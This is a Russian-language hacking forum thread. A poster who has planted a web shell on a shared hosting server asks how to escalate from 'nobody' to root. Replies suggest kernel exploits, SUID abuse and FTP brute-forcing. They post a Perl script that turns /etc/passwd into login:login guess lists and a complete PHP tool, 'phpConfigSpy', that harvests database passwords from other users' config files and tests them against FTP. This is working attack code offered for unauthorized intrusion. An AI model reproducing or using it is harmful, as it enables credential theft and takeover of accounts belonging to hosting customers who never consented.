nobody >> root возможно ли

Привет
залил шелл
id показывает нободи

php инфо показывает

System Linux xxx.xxxxxxxxxx.xxx 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686
Build Date Mar 8 2007 20:58:43
Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
mysql Client API version 4.1.21

запарковано много доменов - штук 100 юзверов
как поднять привелегии
спанель вроде обновляется каждый день - не может же быть что сплойты с милворма работали - а как дальше копать ума не приложу
подскажите план действий пожалуйста


цель - поиметь рута или юзера

disable_classes no value no value
disable_functions no value no value
safe_mode Off

 

Посмотри сплоиты под ядро, под сервисы... Еще как вариант через суйдные файлы... но я в жтом не особо спец...( Погугли на темы которые я привел...

 

скорее всего это какой хостинг, ты проверь по ип ))
лучше не соваться в такой сервак.

 

2Stefun хекеры не чего не бояться!

Проверь поиском на файлы типа password/ посмотри открыт /etc/passwd если да, то пробуй брутить FTP login:login , ищи пасы к БД, возможны эти пасы подойдут к другому сервису.

 

вот тебе парсер:

PHP:

#!/usr/bin/perl

open(IN,"pwd.txt");
open(OUT,">pwds.txt");
while(<IN>) { 
chomp;
if (~/sh$/) {  ## Запишем только валидные аккаунты
($u,@undef)=split ":"; 
print OUT "$u:$u\n";  ## В виде пары login:login
} 
}
close(IN);
close(OUT);


.conf
.config
сonf.php
config.php

 

Раз уж на то пошло, вот мой скрипт для нахождения в системе конфигурационных файлов, вытягивания оттуда пары логин:пароль и пробе подключения к ftp.
скрипт несложный, разберешься.
необходимо изменить всего 2 строчки:

- полный путь до директорий с сайтами.

PHP:

<?php
/*
phpConfigSpy v0.2
coded by p-range #645552
(c) http://p-range.info
*/
echo '<html><head><title>phpConfigSpy v0.2</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
    $str = fgets($passwd);
        if ($i > 35)
        {
            $pos = strpos($str,':');
            $username = substr($str,0,$pos);
            $dirz = '/home/'.$username.'/public_html/';
            if (($username != ''))
            {
                if (is_readable($dirz))
                {
                    array_push($users,$username);
                    array_push($pub,$dirz);
                }
            }
          }
    $i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
    $path = "/home/$user/public_html/";
    read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username)
{
    if ($handle = opendir($path))
    {
        while (false !== ($file = readdir($handle)))
        {
            $fpath = "$path$file";
            if (($file != '.') and ($file != '..'))
            {
                if (is_readable($fpath))
                {
                    $dr = $fpath."/";
                    if (is_dir($dr))
                    {
                        read_dir($dr,$username);
                    }
                    else
                    {
                         if (
                             ($file=='config.php')
                         or ($file=='config.inc.php')
                         or ($file=='conf.php')
                         or ($file=='settings.php')
                         or ($file=='setup.php')
                         or ($file=='dbconf.php')
                         or ($file=='dbconfig.php')
                         or ($file=='db.inc.php')
                         or ($file=='dbconnect.php')
                         or ($file=='connect.php')
                         or ($file=='index.php')
                         or ($file=='common.php')
                         or ($file=='config_global.php')
                         or ($file=='db.php')
                         or ($file=='connect.inc.php')
                         or ($file=='dbconnect.inc.php'))
                        {
                            $pass = get_pass($fpath);
                            if ($pass != '')
                            {
                                echo "[+] $fpath\n$pass\n";
                                ftp_check($username,$pass);
                            }
                        }
                    }
                }
            }
        }
    }
}
function get_pass($link)
{
    @$config = fopen($link,'r');
    while(!feof($config))
    {
        $line = fgets($config);
        if (strstr($line,'pass')
        or strstr($line,'pwd')
        or strstr($line,'db_pass')
        or strstr($line,'dbpass')
        or strstr($line,'passwd'))
        {
            if (strrpos($line,'"'))
            {
                preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
                $pass = str_replace("]=\"","",$pass);
            }
            
            else
                preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
                $pass = str_replace("]='","",$pass);
            return $pass[2];
        }
    }
}
function ftp_check($login,$pass)
{
    @$ftp = ftp_connect('127.0.0.1');
    if ($ftp)
    {
        @$res = ftp_login($ftp,$login,$pass);
        if ($res)
        {
            echo '[FTP] '.$login.':'.$pass."  Success !\n";
        }
        else ftp_quit($ftp);
    }
}
echo '</textarea><br><br>Coded by <b>$re@m3r</b> & <b>p-range</b>  <a href=http://p-range.info>p-range.info</a></body></html>';
?>


 

Если проблемы с сплойтами, заюзай шелл nfm, там есть компилёные, или читай тут
/thread26510.html